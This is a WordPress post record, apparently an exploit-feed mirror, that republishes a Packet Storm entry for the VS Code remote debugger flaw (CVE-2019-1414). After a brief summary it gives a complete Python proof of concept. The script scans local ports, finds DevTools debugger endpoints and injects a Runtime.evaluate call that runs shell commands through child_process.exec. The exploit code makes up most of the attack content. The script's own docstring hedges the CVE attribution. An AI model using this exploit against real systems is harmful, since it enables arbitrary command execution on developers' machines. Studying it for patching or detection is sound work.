{"id":28895,"date":"2025-12-05T13:40:43","date_gmt":"2025-12-05T13:40:43","guid":{"rendered":"http:\/\/localhost\/?p=28895"},"modified":"2025-12-05T13:40:43","modified_gmt":"2025-12-05T13:40:43","slug":"visual-studio-1390-remote-debugger","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=28895","title":{"rendered":"\ud83d\udcc4 Visual Studio 1.39.0 Remote Debugger_PACKETSTORM:212502"},"content":{"rendered":"

{“lastseen”:”2025-12-05T18:52:21″,”description”:”Visual Studio versions 1.30.0 through 1.39.0 had a remote debugger enabled by default that could cause multiple security issues. Code included to scan for any listeners…”,”published”:”2025-12-05T00:00:00″,”modified”:”2025-12-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Visual Studio 1.39.0 Remote Debugger”,”source”:””,”references”:””,”id”:”PACKETSTORM:212502″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2019-1414″],”sourceData”:”=============================================================================================================================================\\n | # Title : Visual Studio 1.30.0 \u2192 1.39.0 Remote Debugger Exploit |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/code.visualstudio.com\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/210646\/ \\u0026 CVE-2019-1414 https:\/\/packetstorm.news\/download\/210646\\n \\n [+] Summary : vulnerability in Visual Studio Code affecting versions 1.30.0 through 1.39.0. \\n In these versions, the remote debugger (Node.js Debug Listener) was enabled by default and listened on a local TCP port without proper restrictions. This allowed any untrusted local user to:\\n Enumerate the listening port Connect to the debugger endpoint Access the internal DevTools JSON API\\n Interact with the running VS Code process Potentially escape sandboxes or manipulate the editor environment\\n The issue was discovered and reported by Tavis Ormandy (Google Project Zero). \\n \\t\\t\\t Microsoft patched the vulnerability in Visual Studio Code 1.39.1, disabling the debug listener by default and improving access restrictions.\\n Affected users should upgrade to the patched version or later to avoid unauthorized debugger access by local users.\\n \\n [+] POC : python poc.py\\n \\n #!\/usr\/bin\/env python3\\n \\”\\”\\”\\n VS Code Remote Debugger Exploit\\n by indoushka\\n CVE-2019-1414 (or similar – this was patched in later versions)\\n \\”\\”\\”\\n \\n import requests\\n import json\\n import websocket\\n import sys\\n import subprocess\\n import threading\\n from urllib.parse import urlparse\\n \\n def find_vscode_debug_ports():\\n \\”\\”\\”Find potential VS Code debugger ports\\”\\”\\”\\n ports = []\\n try:\\n # Try netstat approach\\n result = subprocess.run([‘netstat’, ‘-4nlt’], capture_output=True, text=True)\\n for line in result.stdout.split(‘\\\\n’):\\n if ‘LISTEN’ in line and ‘127.0.0.1’ in line:\\n parts = line.split()\\n if len(parts) \\u003e 3:\\n addr = parts[3]\\n if ‘127.0.0.1:’ in addr:\\n port = addr.split(‘:’)[-1]\\n ports.append(int(port))\\n except:\\n pass\\n \\n # Common VS Code debug ports range\\n common_ports = list(range(59000, 65535))\\n return ports + common_ports\\n \\n def check_debugger_endpoint(port):\\n \\”\\”\\”Check if this port has VS Code debugger\\”\\”\\”\\n try:\\n response = requests.get(f’http:\/\/localhost:{port}\/json\/list’, timeout=2)\\n if response.status_code == 200:\\n data = response.json()\\n if data and len(data) \\u003e 0:\\n return data\\n except:\\n pass\\n return None\\n \\n def exploit_websocket(ws_url, command):\\n \\”\\”\\”Execute command through WebSocket debug interface\\”\\”\\”\\n try:\\n # Connect to WebSocket\\n ws = websocket.create_connection(ws_url)\\n \\n # Debugger protocol messages to execute command\\n setup_messages = [\\n {\\n \\”id\\”: 1,\\n \\”method\\”: \\”Runtime.evaluate\\”,\\n \\”params\\”: {\\n \\”expression\\”: f\\”require(‘child_process’).exec(‘{command}’, (error, stdout, stderr) =\\u003e {{ console.log(stdout); }})\\”,\\n \\”includeCommandLineAPI\\”: True,\\n \\”silent\\”: False,\\n \\”returnByValue\\”: False\\n }\\n }\\n ]\\n \\n for msg in setup_messages:\\n ws.send(json.dumps(msg))\\n response = ws.recv()\\n print(f\\”[+] Response: {response}\\”)\\n \\n ws.close()\\n return True\\n except Exception as e:\\n print(f\\”[-] WebSocket exploit failed: {e}\\”)\\n return False\\n \\n def main():\\n print(\\”[*] VS Code Remote Debugger Exploit PoC\\”)\\n print(\\”[*] Scanning for debugger endpoints…\\”)\\n \\n # Find potential ports\\n ports = find_vscode_debug_ports()\\n print(f\\”[*] Checking {len(ports)} potential ports…\\”)\\n \\n vulnerable_endpoints = []\\n \\n for port in ports[:100]: # Limit to first 100 ports for speed\\n sys.stdout.write(f\\”\\\\r[*] Checking port {port}…\\”)\\n sys.stdout.flush()\\n \\n endpoints = check_debugger_endpoint(port)\\n if endpoints:\\n print(f\\”\\\\n[+] Found debugger on port {port}!\\”)\\n vulnerable_endpoints.extend(endpoints)\\n \\n if not vulnerable_endpoints:\\n print(\\”\\\\n[-] No vulnerable debug endpoints found\\”)\\n return\\n \\n print(f\\”\\\\n[+] Found {len(vulnerable_endpoints)} vulnerable endpoint(s)\\”)\\n \\n for endpoint in vulnerable_endpoints:\\n print(f\\”\\\\n[+] Target: {endpoint.get(‘title’, ‘Unknown’)}\\”)\\n print(f\\” Type: {endpoint.get(‘type’, ‘Unknown’)}\\”)\\n print(f\\” WebSocket: {endpoint.get(‘webSocketDebuggerUrl’, ‘N\/A’)}\\”)\\n \\n # Test with a simple command\\n ws_url = endpoint.get(‘webSocketDebuggerUrl’)\\n if ws_url:\\n # Replace with your test command\\n test_command = \\”whoami \\u003e \/tmp\/vscode_poc.txt \\u0026\\u0026 echo ‘Exploit successful’\\”\\n if sys.platform == \\”win32\\”:\\n test_command = \\”whoami \\u003e C:\\\\\\\\temp\\\\\\\\vscode_poc.txt \\u0026\\u0026 echo Exploit successful\\”\\n \\n print(f\\”[*] Attempting to execute: {test_command}\\”)\\n if exploit_websocket(ws_url, test_command):\\n print(\\”[+] Command execution attempted!\\”)\\n else:\\n print(\\”[-] Command execution failed\\”)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n \\t\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212502″,”cvss”:{“score”:7.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212502\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-05T18:52:21″,”description”:”Visual Studio versions 1.30.0 through 1.39.0 had a remote debugger enabled by default that could cause multiple security issues. Code included to scan for any…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,15,13,53,7,11,5],"class_list":["post-28895","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Visual Studio 1.39.0 Remote Debugger_PACKETSTORM:212502 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=28895\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Visual Studio 1.39.0 Remote Debugger_PACKETSTORM:212502 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-05T18:52:21″,”description”:”Visual Studio versions 1.30.0 through 1.39.0 had a remote debugger enabled by default that could cause multiple security issues. Code included to scan for any...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=28895\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-05T13:40:43+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28895#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28895\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Visual Studio 1.39.0 Remote Debugger_PACKETSTORM:212502\",\"datePublished\":\"2025-12-05T13:40:43+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28895\"},\"wordCount\":921,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.8\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28895#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28895\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28895\",\"name\":\"\ud83d\udcc4 Visual Studio 1.39.0 Remote Debugger_PACKETSTORM:212502 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-05T13:40:43+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28895#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28895\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28895#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Visual Studio 1.39.0 Remote Debugger_PACKETSTORM:212502\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Visual Studio 1.39.0 Remote Debugger_PACKETSTORM:212502 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=28895","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Visual Studio 1.39.0 Remote Debugger_PACKETSTORM:212502 - zero redgem","og_description":"{“lastseen”:”2025-12-05T18:52:21″,”description”:”Visual Studio versions 1.30.0 through 1.39.0 had a remote debugger enabled by default that could cause multiple security issues. Code included to scan for any...","og_url":"https:\/\/zero.redgem.net\/?p=28895","og_site_name":"zero redgem","article_published_time":"2025-12-05T13:40:43+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=28895#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=28895"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Visual Studio 1.39.0 Remote Debugger_PACKETSTORM:212502","datePublished":"2025-12-05T13:40:43+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=28895"},"wordCount":921,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.8","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=28895#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=28895","url":"https:\/\/zero.redgem.net\/?p=28895","name":"\ud83d\udcc4 Visual Studio 1.39.0 Remote Debugger_PACKETSTORM:212502 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-05T13:40:43+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=28895#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=28895"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=28895#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Visual Studio 1.39.0 Remote Debugger_PACKETSTORM:212502"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28895","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=28895"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28895\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=28895"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=28895"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=28895"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}